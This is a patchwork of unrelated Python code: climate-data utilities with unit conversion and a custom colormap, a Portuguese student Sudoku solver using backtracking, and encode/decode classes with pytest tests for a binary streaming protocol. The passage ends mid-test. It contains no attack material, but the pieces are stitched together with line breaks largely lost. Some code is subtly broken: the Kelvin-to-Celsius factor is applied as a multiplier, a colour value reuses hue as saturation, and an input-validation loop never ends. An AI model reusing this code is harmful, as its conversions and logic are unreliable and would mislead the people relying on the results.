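# --- Illustrative call for patch_with_gaps_and_eventsize above; the toy binary
# series is made up. Gaps of at most max_gap are bridged, and a merged event is
# kept only if it contains at least one run of min_cont_event_size consecutive 1s;
# 'triggers' holds the starting index of each qualifying event.
import numpy as np
toy = np.array([0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0])
events, triggers = patch_with_gaps_and_eventsize(toy, max_gap=2,
                                                 min_cont_event_size=3, lag=0)
print(triggers)   # expected: [ 2 11] with these settings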
def norm(arr): if np.max(arr) == np.min(arr) : return np.array([0]*len(arr)) return np.array([(x-np.min(arr))/(np.max(arr)-np.min(arr)) for x in arr]) def Unit_Conversions(From ='kg m-2 s-1', To='mm day-1'): """ To assist with the unit conversion "From" to "To" units Returns: -------- the multiplication factor and the new units ("To") """ From = str (From) To = str (To) if From == To: unit_con_factor = 1 unit_con_name = To elif (From in ['kgm-2s-1', 'kg m-2 s-1']) and (To in ['mmday-1','mm day-1', 'mm/day']): unit_con_factor = 86400 unit_con_name = To elif (To in ['kgm-2s-1', 'kg m-2 s-1']) and (From in ['mmday-1','mm day-1', 'mm/day']): unit_con_factor = 86400**(-1) unit_con_name = To elif (From in ['kgm-2', 'kg m-2']) and (To in ['mm']): unit_con_factor = 1 unit_con_name = To elif (To in ['kgm-2', 'kg m-2']) and (From in ['mm']): unit_con_factor = 1 unit_con_name = To elif (From in ['K']) and (To in ['C']): unit_con_factor = -273.15 unit_con_name = To elif (To in ['C']) and (From in ['K']): unit_con_factor = 273.15 unit_con_name = To return unit_con_factor, unit_con_name # To make a new masked series when encounded with an error due to ma.core.MaskedConstant error def MaskedConstant_Resolve (ar): """ To make a new masked series when encounded with an error due to ma.core.MaskedConstant error Input: ------ ar: any array or list or series Returns: ------- a masked array with error replaced by np.nan and made invalid with masking """ from numpy.ma import masked values = [] for val in ar: if val is masked: val = np.nan values.append(val) return np.ma.masked_invalid(values) # To make a new masked series when encounded with an error due to numpy.ma.core.MaskedArray def MaskedArray_Resolve (ar): """ To make a new masked series when encounded with an error due to ma.core.MaskedConstant error Input: ------ ar: any array or list or series Returns: ------- a masked array with error replaced by np.nan and made invalid with masking """ values = [] for val in ar: try: val = float(val) except: val = np.nan values.append(val) return np.ma.masked_invalid(values) # Register RdGn colormap import colorsys as cs import matplotlib.pyplot as plt val = 0.8 Rd = cs.rgb_to_hsv(1,0,0) Rd = cs.hsv_to_rgb(Rd[0],Rd[1],val) Gn = cs.rgb_to_hsv(0,1,0) Gn = cs.hsv_to_rgb(Gn[0],Gn[0],val) RdGn = {'red' : ((0.0, 0.0, Rd[0]), (0.5, 1.0, 1.0 ), (1.0, Gn[0], 0.0 )), 'green': ((0.0, 0.0, Rd[1]), (0.5, 1.0, 1.0 ), (1.0, Gn[1], 0.0 )), 'blue' : ((0.0, 0.0, Rd[2]), (0.5, 1.0, 1.0 ), (1.0, Gn[2], 0.0 ))} plt.register_cmap(name = 'RdGn',data = RdGn) #|------------------------------------------------------# #|Trabalho de buscas - Inteligência artificial # #|Grupo: # #|<NAME> 628182 # #|<NAME> 628174 # #|<NAME> 628247 # #|------------------------------------------------------# #|Resolucao de um jogo Sudoku utilizando a busca em # #|profundidade (não informada) # #|------------------------------------------------------# # A ideia do algoritmo é que a cada iteração ele procura por um espaço vazio (representado por valores de 0) # Essa busca é sempre feita da esquerda para a direita e de cima para baixo no tabuleiro. # Após um valor ser encontrado, o algoritmo entra em um loop for que testa todos os 9 possíveis valores para # aquele espaço, sempre verificando se aquela jogada é possível. # # Caso o a jogada (combinação de valor e posição) seja possível, o algoritmo atribui o novo valor para a # posição e chama a função de resolver o sudoku recursivamente no novo tabuleiro. 
# Quando uma jogada não pode ser feita, o algoritmo tenta o próximo valor possível para aquela posição. # Caso nenhum valor seja possível, o algoritmo retorna falso para a função acima na recusão indicando que # o caminho escolhido não leva ao resultado final e este tenta outro valor. # Caso o valor Falso retorne, para todas as oções, até a primeira chamada da função que resolve o jogo, # o algoritmo final retorna falso indicando que não foi possível resolver o jogo. from os import system, name from time import sleep #DEBUG debug = False # Conta o número de iterações até ser resolvido o jogo numIter = 0 # Funcao de limpar tela def limpaTela(): # Windows if name == 'nt': _ = system('cls') # mac e linux else: _ = system('clear') # Função que recebe um tabuleior na forma de listas e printa na tela de um jeito mais fácil de ver def printaTabuleiro(tabuleiro): print("+" + "---+"*9) for i, row in enumerate(tabuleiro): print(("|" + " {} {} {} |"*3).format(*[x if x != 0 else " " for x in row])) if i % 3 == 2: print("+" + "---+"*9) else: print("+" + " +"*9) # Função que acha a próxima possição vazia do tabuleiro para realizar a próxima jogada def achaProxPosVazia(tabuleiro): for i in range(0,9): for j in range(0,9): if tabuleiro[i][j] == 0: return i,j return -1,-1 # Função que verifica se a jogada é possivel # Verifica 3 condições: ### Se não há o valor na linha ### Se não há o valor na coluna ### Se não há o valor na seção (quadrado) def valorLocalValido(tabuleiro, row, col, val): # Verifica se não há o valor da jogada na linha for j in range(9): if tabuleiro[row][j] == val: return False # Verifica se não há o valor da jogada na coluna for i in range(9): if tabuleiro[i][col] == val: return False # Verifica se não há o valor da jogada na seção secLinInicial = (row//3) * 3 secColInicial = (col//3) * 3 for i in range(secLinInicial, secLinInicial+3): for j in range(secColInicial, secColInicial+3): if tabuleiro[i][j] == val: return False # Se nao encontrou nenhum problema retorna verdadeiro return True # Função se resuloção do jogo que é chamada recursivamente # Recebe o tabuleiro e o tempo de espera para melhor visualização def resolverSudoku(tabuleiro, tempoEspera): #variavel global para o número de iterações global numIter #Mais uma iteração numIter = numIter + 1 limpaTela() printaTabuleiro(tabuleiro) # Espera 0.5 segundos para a próxima jogada para melhor visualização sleep(tempoEspera) row,col = achaProxPosVazia(tabuleiro) if row == -1 or col == -1: #nao ha mais valores 0, o jogo foi concluído return True #Testa todos os 9 possíveis valores começando em 0 for val in range(1,10): # verifica se a jogada é valida if(valorLocalValido(tabuleiro, row, col, val)): # Se a jogada é valida, atualiza o tabuleiro e resolve o novo jogo tabuleiro[row][col] = val if(resolverSudoku(tabuleiro, tempoEspera)): return True # Se um falso foi retornado desfaz a última jogada e tenta o proximo valor tabuleiro[row][col] = 0 # Se nenhum valor foi encontrado, retorna falso, indicando que não eh possivel resolver return False muitoFacil = [ [1, 0, 0, 5, 0, 9, 6, 7, 0], [4, 0, 2, 8, 7, 0, 0, 1, 9], [9, 6, 7, 1, 4, 3, 2, 8, 5], [2, 0, 4, 9, 0, 0, 0, 0, 0], [5, 0, 6, 0, 0, 0, 0, 0, 8], [0, 0, 0, 0, 1, 0, 4, 2, 0], [0, 0, 0, 3, 6, 2, 7, 4, 0], [6, 4, 0, 0, 0, 1, 0, 5, 0], [0, 2, 1, 4, 0, 8, 9, 3, 6], ] facil = [ [1, 2, 9, 0, 6, 0, 0, 0, 3], [0, 0, 0, 0, 0, 0, 0, 0, 9], [0, 0, 0, 3, 5, 0, 0, 0, 8], [0, 0, 0, 8, 0, 3, 9, 0, 0], [3, 0, 1, 0, 0, 0, 5, 0, 2], [0, 0, 6, 1, 0, 5, 0, 0, 0], [4, 0, 0, 0, 7, 6, 0, 0, 0], [2, 0, 0, 0, 0, 
0, 0, 0, 0], [9, 0, 0, 0, 8, 0, 1, 3, 4], ] medio = [ [6, 0, 1, 0, 0, 0, 5, 0, 8], [0, 0, 0, 0, 8, 0, 0, 0, 0], [0, 0, 0, 5, 0, 2, 0, 0, 0], [2, 0, 8, 1, 0, 4, 6, 0, 3], [1, 0, 0, 3, 0, 7, 0, 0, 4], [0, 0, 3, 0, 0, 0, 7, 0, 0], [7, 6, 0, 0, 0, 0, 0, 1, 2], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 0, 6, 0, 8, 0, 4, 0], ] dificil = [ [0, 0, 7, 5, 0, 1, 9, 0, 0], [0, 0, 8, 0, 6, 0, 4, 0, 0], [0, 5, 0, 8, 0, 4, 0, 7, 0], [0, 0, 2, 0, 7, 0, 3, 0, 0], [4, 0, 0, 0, 8, 0, 0, 0, 9], [0, 3, 0, 0, 1, 0, 0, 6, 0], [1, 9, 0, 0, 0, 0, 0, 5, 4], [0, 7, 0, 0, 0, 0, 0, 3, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], ] muitoDificil = [ [4, 0, 0, 0, 0, 0, 0, 0, 7], [2, 0, 0, 0, 1, 0, 0, 0, 4], [0, 1, 0, 0, 0, 0, 0, 5, 0], [5, 0, 1, 0, 4, 0, 7, 0, 6], [0, 3, 0, 1, 0, 8, 0, 4, 0], [0, 0, 0, 6, 0, 3, 0, 0, 0], [0, 0, 2, 0, 0, 0, 4, 0, 0], [7, 0, 0, 0, 8, 0, 0, 0, 9], [0, 5, 0, 0, 2, 0, 0, 7, 0], ] #VARIAVEIS DE DEBUG if (debug): sleepTime = 0.0 else: sleepTime = 0.5 meuSudoku = [] # Opcao do usuario opcao = 0 limpaTela() # Menu inicial print("**********SUDOKU IA**********") print("\n\nSelecione o tipo de jogo:") print("1 - Rodar exemplo Muito Fácil") print("2 - Rodar exemplo Fácil") print("3 - Rodar exemplo Médio") print("4 - Rodar exemplo Difícil") print("5 - Rodar exemplo Muito Difícil") print("6 - Inserir um Sudoku") #Le opção opcao = int(input()) #Trata cada opção if opcao == 1: print(resolverSudoku(muitoFacil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 2: print(resolverSudoku(facil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 3: print(resolverSudoku(medio, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 4: print(resolverSudoku(dificil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 5: print(resolverSudoku(muitoDificil, sleepTime), "\n", "Número de iterações: ", numIter) elif opcao == 6: limpaTela() print("Digite seu Sudoku, os elementos devem ser números de 0 a 9, sendo 0 uma casa vazia\n") # Lê os inputs do usuários for i in range(0, 9): elementos = list(map(int, input().split())) #Condições do sudoku while(len(elementos) != 9): print("Cada fileira deve ter 9 elementos") elementos = list(map(int, input().split())) while(i > 9 or i < 0 for i in elementos): print("Os elementos devem ser de 0 a 9") elementos = list(map(int, input().split())) meuSudoku.append(elementos) print(resolverSudoku(meuSudoku, sleepTime), "\n", "Número de iterações: ", numIter)from __future__ import unicode_literals import struct import itertools try: from StringIO import StringIO except ImportError: from io import BytesIO as StringIO class Hello(object): """ Hello(version: String, cookie: String, program_name: String, instance_name: String) """ def __init__(self, version, cookie, program_name, instance_name): self.version = version self.cookie = cookie self.program_name = program_name self.instance_name = instance_name def __str__(self): return ("Hello(version={!r}, cookie={!r}, program_name={!r}, " "instance_name={!r})" .format(self.version, self.cookie, self.program_name, self.instance_name)) def __eq__(self, other): return (self.version == other.version and self.cookie == other.cookie and self.program_name == other.program_name and self.instance_name == other.instance_name) def encode(self): v, c, p, i = map(lambda x: x.encode(), (self.version, self.cookie, self.program_name, self.instance_name)) return struct.pack(">H{}sH{}sH{}sH{}s" .format(*map(len, (v, c, p, i))), len(v), v, len(c), c, len(p), p, len(i), i) @staticmethod def decode(bs): reader = StringIO(bs) 
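# --- Worked example of the Hello frame layout produced by encode() above, using the
# same values as test_hello: every field is a 2-byte big-endian length prefix
# followed by the UTF-8 bytes of the field, so Hello("a", "b", "c", "d") encodes to
# 4 * (2 + 1) = 12 bytes. Meant to be run once the full class definition is available.
frame = Hello("a", "b", "c", "d").encode()
assert frame == b"\x00\x01a\x00\x01b\x00\x01c\x00\x01d"
assert Hello.decode(frame) == Hello("a", "b", "c", "d")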
version_length = struct.unpack(">H", reader.read(2))[0] version = reader.read(version_length).decode() cookie_length = struct.unpack(">H", reader.read(2))[0] cookie = reader.read(cookie_length).decode() program_name_length = struct.unpack(">H", reader.read(2))[0] program_name = reader.read(program_name_length).decode() instance_name_length = struct.unpack(">H", reader.read(2))[0] instance_name = reader.read(instance_name_length).decode() return Hello(version, cookie, program_name, instance_name) def test_hello(): version, cookie, program, instance = "a", "b", "c", "d" hello = Hello(version, cookie, program, instance) assert(hello.version == version) assert(hello.cookie == cookie) assert(hello.program_name == program) assert(hello.instance_name == instance) encoded = hello.encode() assert(len(encoded) == 12) decoded = Hello.decode(encoded) assert(decoded.version == version) assert(decoded.cookie == cookie) assert(decoded.program_name == program) assert(decoded.instance_name == instance) assert(hello == decoded) assert(str(hello) == str(decoded)) class Ok(object): """ Ok(initial_credits: U32, credit_list: Array[(stream_id: U64, stream_name: bytes, point_of_ref: U64)], source_list: Array[(source_name: String, source_address: String)]) """ def __init__(self, initial_credits, credit_list, source_list): self.initial_credits = initial_credits self.credit_list = credit_list self.source_list = source_list def __str__(self): return ("Ok(initial_credits={!r}, credit_list={!r}, source_list={!r})" .format(self.initial_credits, self.credit_list, self.source_list)) def __eq__(self, other): return (self.initial_credits == other.initial_credits and self.credit_list == other.credit_list and self.source_list == other.source_list) def encode(self): packed_credits = [] for (sid, sn, por) in self.credit_list: packed_credits.append( struct.pack('>QH{}sQ'.format(len(sn)), sid, len(sn), sn, por)) packed_sources = [] for source, addr in self.source_list: s = source.encode() a = addr.encode() packed_sources.append( struct.pack('>H{}sH{}s'.format(len(s), len(a)), len(s), s, len(a), a)) return (struct.pack('>II', self.initial_credits, len(self.credit_list)) + b''.join(packed_credits) + struct.pack('>I', len(packed_sources)) + b''.join(packed_sources)) @staticmethod def decode(bs): reader = StringIO(bs) initial_credit = struct.unpack(">I", reader.read(4))[0] credit_list_length = struct.unpack(">I", reader.read(4))[0] credit_list = [] for _ in range(credit_list_length): stream_id = struct.unpack(">Q", reader.read(8))[0] stream_name_length = struct.unpack(">H", reader.read(2))[0] stream_name = reader.read(stream_name_length) point_of_ref = struct.unpack(">Q", reader.read(8))[0] credit_list.append((stream_id, stream_name, point_of_ref)) source_list_length = struct.unpack('>I', reader.read(4))[0] source_list = [] for _ in range(source_list_length): source_length = struct.unpack('>H', reader.read(2))[0] source = reader.read(source_length).decode() addr_length = struct.unpack('>H', reader.read(2))[0] addr = reader.read(addr_length).decode() source_list.append((source, addr)) return Ok(initial_credit, credit_list, source_list) def test_ok(): ic, cl = 100, [(1, b"1", 0), (2, b"2", 1)] sl = [("source1", "127.0.0.1:7000"), ("source2", "192.168.0.1:5555")] ok = Ok(ic, cl, sl) assert(ok.initial_credits == ic) assert(ok.credit_list == cl) assert(ok.source_list == sl) encoded = ok.encode() assert(len(encoded) == (4 + 4 + len(cl)*(8 + 2 + 1 + 8) + 4 + sum((4 + sum(map(len, p)) for p in sl)))) decoded = Ok.decode(encoded) 
assert(isinstance(decoded, Ok)) assert(decoded.initial_credits == ic) assert(decoded.credit_list == cl) assert(decoded == ok) assert(str(decoded) == str(ok)) class Error(object): """ Error(msg: String) """ def __init__(self, msg): self.message = msg def __str__(self): return "Error(message={!r})".format(self.message) def __eq__(self, other): return self.message == other.message def encode(self): encoded = self.message.encode() return struct.pack(">H{}s".format(len(encoded)), len(encoded), encoded) @staticmethod def decode(bs): reader = StringIO(bs) msg_length = struct.unpack(">H", reader.read(2))[0] msg = reader.read(msg_length).decode() return Error(msg) def test_error(): msg = "hello world" error = Error(msg) assert(error.message == msg) encoded = error.encode() assert(len(encoded) == len(msg.encode()) + 2) decoded = Error.decode(encoded) assert(isinstance(decoded, Error)) assert(decoded.message == msg) assert(decoded == error) assert(str(decoded) == str(error)) class Notify(object): """ Notify(stream_id: U64, stream_name: bytes, point_of_ref: U64) """ def __init__(self, stream_id, stream_name, point_of_ref=0): self.stream_id = stream_id self.stream_name = stream_name self.point_of_ref = point_of_ref def __str__(self): return ("Notify(stream_id={!r}, stream_name={!r}, point_of_ref={!r})" .format(self.stream_id, self.stream_name, self.point_of_ref)) def __eq__(self, other): return (self.stream_id == other.stream_id and self.stream_name == other.stream_name and self.point_of_ref == other.point_of_ref) def encode(self): return struct.pack(">QH{}sQ".format(len(self.stream_name)), self.stream_id, len(self.stream_name), self.stream_name, self.point_of_ref) @staticmethod def decode(bs): reader = StringIO(bs) stream_id = struct.unpack(">Q", reader.read(8))[0] stream_name_length = struct.unpack(">H", reader.read(2))[0] stream_name = reader.read(stream_name_length) point_of_ref = struct.unpack(">Q", reader.read(8))[0] return Notify(stream_id, stream_name, point_of_ref) def test_notify(): sid, sn, por = 0, b"0", 1 notify = Notify(sid, sn, por) assert(notify.stream_id == sid) assert(notify.stream_name == sn) assert(notify.point_of_ref == por) encoded = notify.encode() assert(len(encoded) == 8 + 2 + 1 + 8) decoded = Notify.decode(encoded) assert(isinstance(decoded, Notify)) assert(decoded.stream_id == sid) assert(decoded.stream_name == sn) assert(decoded.point_of_ref == por) assert(decoded == notify) assert(str(decoded) == str(notify)) class NotifyAck(object): """ NotifyAck(notify_success: Bool, stream_id: U64, point_of_ref: U64) """ def __init__(self, notify_success, stream_id, point_of_ref): self.notify_success = notify_success self.stream_id = stream_id self.point_of_ref = point_of_ref def __str__(self): return ("NotifyAck(notify_success={!r}, stream_id={!r}, point_of_ref={!r})" .format(self.notify_success, self.stream_id, self.point_of_ref)) def __eq__(self, other): return (self.notify_success == other.notify_success and self.stream_id == other.stream_id and self.point_of_ref == other.point_of_ref) def encode(self): return struct.pack('>?QQ', self.notify_success, self.stream_id, self.point_of_ref) @staticmethod def decode(bs): reader = StringIO(bs) notify_success = struct.unpack(">?", reader.read(1))[0] stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] return NotifyAck(notify_success, stream_id, point_of_ref) def test_notify_ack(): suc, sid, por = False, 0, 12 notify_ack = NotifyAck(suc, sid, por) assert(notify_ack.notify_success == suc) 
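# --- The decoders above repeatedly read a 2-byte big-endian length and then that
# many bytes. A small helper capturing that pattern is sketched here; the name
# read_short_bytes is an assumption for illustration and is not used by the source.
def read_short_bytes(reader):
    length = struct.unpack(">H", reader.read(2))[0]
    return reader.read(length)

# e.g. the body of Error.decode could then be written as:
#   msg = read_short_bytes(reader).decode()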
assert(notify_ack.stream_id == sid) assert(notify_ack.point_of_ref == por) encoded = notify_ack.encode() assert(len(encoded) == 1 + 8 + 8) decoded = NotifyAck.decode(encoded) assert(isinstance(decoded, NotifyAck)) assert(decoded.notify_success == suc) assert(decoded.stream_id == sid) assert(decoded.point_of_ref == por) assert(decoded == notify_ack) assert(str(decoded) == str(notify_ack)) class Message(object): """ Message(stream_id: int, flags: byte, message_id: (int | None), event_time: int, key: (bytes | None), message: (bytes | None)) """ Ephemeral = 1 Boundary = 2 Eos = 4 UnstableReference = 8 EventTime = 16 Key = 32 def __init__(self, stream_id, flags, message_id=None, event_time=None, key=None, message=None): self.test_flags_allowed(flags, message_id, event_time, key, message) self.stream_id = stream_id self.flags = flags self.message_id = message_id self.event_time = event_time if key is None or isinstance(key, bytes): self.key = key else: raise TypeError("Parameter key must be either None or bytes") if message is None or isinstance(message, bytes): self.message = message else: raise TypeError("Parameter message must be either None or bytes") def __str__(self): return ("Message(stream_id={!r}, flags={!r}, message_id={!r}, event_time" "={!r}, key={!r}, message={!r})".format( self.stream_id, self.flags, self.message_id, self.event_time, self.key, self.message)) def __eq__(self, other): return (self.stream_id == other.stream_id and self.flags == other.flags and self.message_id == other.message_id and self.event_time == other.event_time and self.key == other.key and self.message == other.message) def encode(self): self.test_flags_allowed(self.flags, self.message_id, self.event_time, self.key, self.message) sid = struct.pack('>Q', self.stream_id) flags = struct.pack('>B', self.flags) messageid = (struct.pack('>Q', self.message_id) if self.message_id else b'') event_time = (struct.pack('>q', self.event_time) if self.event_time else b'') key = (struct.pack('>H{}s'.format(len(self.key)), len(self.key), self.key) if self.key else b'') msg = self.message if self.message else b'' return b''.join((sid, flags, messageid, event_time, key, msg)) @classmethod def decode(cls, bs): reader = StringIO(bs) stream_id, flags = struct.unpack('>QB', reader.read(9)) if not (flags & cls.Ephemeral == cls.Ephemeral): message_id = struct.unpack('>Q', reader.read(8))[0] else: message_id = None if flags & cls.EventTime == cls.EventTime: event_time = struct.unpack('>q', reader.read(8))[0] else: event_time = None if flags & cls.Key == cls.Key: key_length = struct.unpack('>H', reader.read(2))[0] key = reader.read(key_length) else: key = None if not (flags & cls.Boundary == cls.Boundary): message = reader.read() else: message = None return cls(stream_id, flags, message_id, event_time, key, message) @classmethod def test_flags_allowed(cls, flags, message_id=None, event_time=None, key=None, message=None): """ Allowed flag combinations E B Eo Un Et K E x x x x B x x x Eo x x x x Un x x x Et x x K x """ if flags & cls.Ephemeral == cls.Ephemeral: assert(message_id is None) assert(not (flags & cls.Boundary == cls.Boundary)) assert(not (flags & cls.UnstableReference == cls.UnstableReference)) else: assert(message_id is not None) if flags & cls.Boundary == cls.Boundary: assert(not (flags & cls.UnstableReference == cls.UnstableReference)) assert(not (flags & cls.Key == cls.Key)) assert(key is None) if flags & cls.Boundary == cls.Boundary: assert(message is None) if flags & cls.Key == cls.Key: assert(key is not None) else: 
assert(key is None) if flags & cls.UnstableReference == cls.UnstableReference: assert(message_id is not None) if flags & cls.EventTime == cls.EventTime: assert(event_time is not None) else: assert(event_time is None) def test_message(): from itertools import chain, product from functools import reduce import pytest M = Message stream_id = 123 message_id = 456 event_time = 1001 key = 'key'.encode() message = 'hello world'.encode() """ Allowed flag combinations E B Eo Un Et K E x x x x B x x x Eo x x x x Un x x x Et x x K x """ flags = [M.Ephemeral, M.Boundary, M.Eos, M.UnstableReference, M.EventTime, M.Key] matrix = [ # E B Eo Un Et K [ 1, 0, 1, 0, 1, 1 ], # E [ 0, 1, 1, 0, 1, 0 ], # B [ 0, 0, 1, 1, 1, 1 ], # Eos [ 0, 0, 0, 1, 1, 1 ], # Un [ 0, 0, 0, 0, 1, 1 ], # Et [ 0, 0, 0, 0, 0, 1 ]] # K # Get all unique combinations of flags. There are 63 of them. combinations = list(itertools.chain.from_iterable(( itertools.combinations(flags, d) for d in range(1, len(flags)+1)))) flag_values = [reduce(lambda x,y: x | y, comb) for comb in combinations] for fv in flag_values: if fv & M.Ephemeral == M.Ephemeral: # raise if ephemeral & boundary if fv & M.Boundary: with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) # raise if ephemeral & unstable reference if fv & M.UnstableReference == M.UnstableReference: with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) fv = fv & ~M.Boundary & ~M.UnstableReference # raise if message_id is not none, but make sure we don't raise # because of key or eventtime f = fv | M.EventTime | M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, key, message) # Don't raise otherwise # with Key and EventTime M.test_flags_allowed(f, None, event_time, key, message) # With EventTime, but no Key set f = (fv | M.EventTime) & ~M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) M.test_flags_allowed(f, None, event_time, None, message) # With Key, but not EventTime f = (fv | M.Key) & ~M.EventTime with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) M.test_flags_allowed(f, None, None, key, message) # No Key, no Eventtime f = fv & ~M.Key & ~M.EventTime with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, None, event_time, None, message) M.test_flags_allowed(f, None, None, None, message) # No ephemeral... moving on! 
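# --------------------------------------------------------------------------
# Note on the combination generation in test_message above: the function only
# does `from itertools import chain, product`, yet calls itertools.chain and
# itertools.combinations, which raises a NameError unless itertools is also
# imported at module level elsewhere in this file. A self-contained sketch of
# the same "all 63 non-empty flag combinations" computation using the imported
# names directly:
from functools import reduce
from itertools import chain, combinations

def _all_flag_values(flags):
    combos = chain.from_iterable(
        combinations(flags, d) for d in range(1, len(flags) + 1))
    return [reduce(lambda x, y: x | y, combo) for combo in combos]

# Six single-bit flags yield 2**6 - 1 = 63 distinct OR-combinations.
assert len(set(_all_flag_values([1, 2, 4, 8, 16, 32]))) == 63
# --------------------------------------------------------------------------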
elif fv & M.Boundary == M.Boundary: # Raise if unstable reference if fv & M.UnstableReference == M.UnstableReference: f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, None, None) # raise if key if fv & M.Key == M.Key: f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, key, None) # raise if message is not None f = fv | M.EventTime | M.Eos with pytest.raises(Exception) as e_info: M.test_flags_allowed(f, message_id, event_time, None, message) elif fv & M.Eos == M.Eos: # UnstableReference, EventTime, and Key are all allowed, but not # required # Both Key and EventTime if ((fv & M.EventTime == M.EventTime) and (fv & M.Key == M.Key)): M.test_flags_allowed(fv, message_id, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) # Only EventTime elif fv & M.EventTime == M.EventTime: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, key, message) # Only Key elif fv & M.Key == M.Key: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, message_id, None, None, message) # Neither Key nor EventTime else: M.test_flags_allowed(fv, message_id, None, None, message) # Fail if message_id is missing, because not ephemeral f = fv | M.EventTime | M.Key with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) elif fv & M.UnstableReference == M.UnstableReference: # message_id cannot be None # EventTime and Key are optional # message can't be None (Eos+UnstableRef case already tested above) # Both Key and EventTime if ((fv & M.EventTime == M.EventTime) and (fv & M.Key == M.Key)): M.test_flags_allowed(fv, message_id, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) # Only EventTime elif fv & M.EventTime == M.EventTime: M.test_flags_allowed(fv, message_id, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) # Only Key elif fv & M.Key == M.Key: M.test_flags_allowed(fv, message_id, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, key, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, event_time, None, message) with 
pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, message) # Neither Key nor EventTime else: M.test_flags_allowed(fv, message_id, None, None, message) with pytest.raises(Exception) as e_info: M.test_flags_allowed(fv, None, None, None, None) # Test that for valid combinations, messages encode<->decode # successfully combs = [ # Ephemeral 1, 1 | 4, 1 | 16, 1 | 32, 1 | 4 | 16, 1 | 4 | 32, 1 | 4 | 16 | 32, # Boundary 2, 2 | 4, 2 | 16, 2 | 4 | 16, # EOS 4, 4 | 8, 4 | 16, 4 | 32, 4 | 8 | 16, 4 | 8 | 32, 4 | 8 | 16 | 32, # UnstableReference 8, 8 | 16, 8 | 32, 8 | 16 | 32, # EventTime 16, 16 | 32, # Key 32 ] for fl in combs: msg = Message( stream_id, fl, None if (fl & M.Ephemeral == M.Ephemeral) else message_id, event_time if (fl & M.EventTime == M.EventTime) else None, key if (fl & M.Key == M.Key) else None, None if (fl & M.Boundary == M.Boundary) else message) assert(msg.stream_id == stream_id) assert(msg.message_id == ( None if fl & M.Ephemeral == M.Ephemeral else message_id)) assert(msg.event_time == ( event_time if fl & M.EventTime == M.EventTime else None)) assert(msg.key == ( key if fl & M.Key == M.Key else None)) assert(msg.message == ( None if fl & M.Boundary == M.Boundary else message)) encoded = msg.encode() assert(len(encoded) == ( 8 + 1 + (8 if msg.message_id else 0) + (8 if msg.event_time else 0) + ((2 + len(key)) if msg.key else 0) + (len(message) if msg.message else 0))) decoded = Message.decode(encoded) assert(isinstance(decoded, Message)) assert(decoded.stream_id == msg.stream_id) assert(decoded.flags == msg.flags) assert(decoded.message_id == msg.message_id) assert(decoded.event_time == msg.event_time) assert(decoded.key == msg.key) assert(decoded.message == msg.message) assert(decoded == msg) assert(str(decoded) == str(msg)) # Test that all messages frame encode/decode correctly _test_frame_encode_decode(msg) class Ack(object): """ Ack(credits: U32, acks: Array[(stream_id: U64, point_of_ref: U64)] """ def __init__(self, credits, acks): self.credits = credits self.acks = acks def __str__(self): return "Ack(credits={!r}, acks={!r})".format(self.credits, self.acks) def __eq__(self, other): return (self.credits == other.credits and self.acks == other.acks) def encode(self): return (struct.pack('>II', self.credits, len(self.acks)) + b''.join(( struct.pack('>QQ', sid, por) for sid, por in self.acks))) @staticmethod def decode(bs): reader = StringIO(bs) credits = struct.unpack(">I", reader.read(4))[0] acks_length = struct.unpack(">I", reader.read(4))[0] acks = [] for _ in range(acks_length): stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] acks.append((stream_id, point_of_ref)) return Ack(credits, acks) def test_ack(): c, acks = 100, [(1, 12), (2, 25), (5, 501)] ack = Ack(c, acks) assert(ack.credits == c) assert(ack.acks == acks) encoded = ack.encode() assert(len(encoded) == 4 + 4 + len(acks)*(8+8)) decoded = Ack.decode(encoded) assert(isinstance(decoded, Ack)) assert(decoded.credits == c) 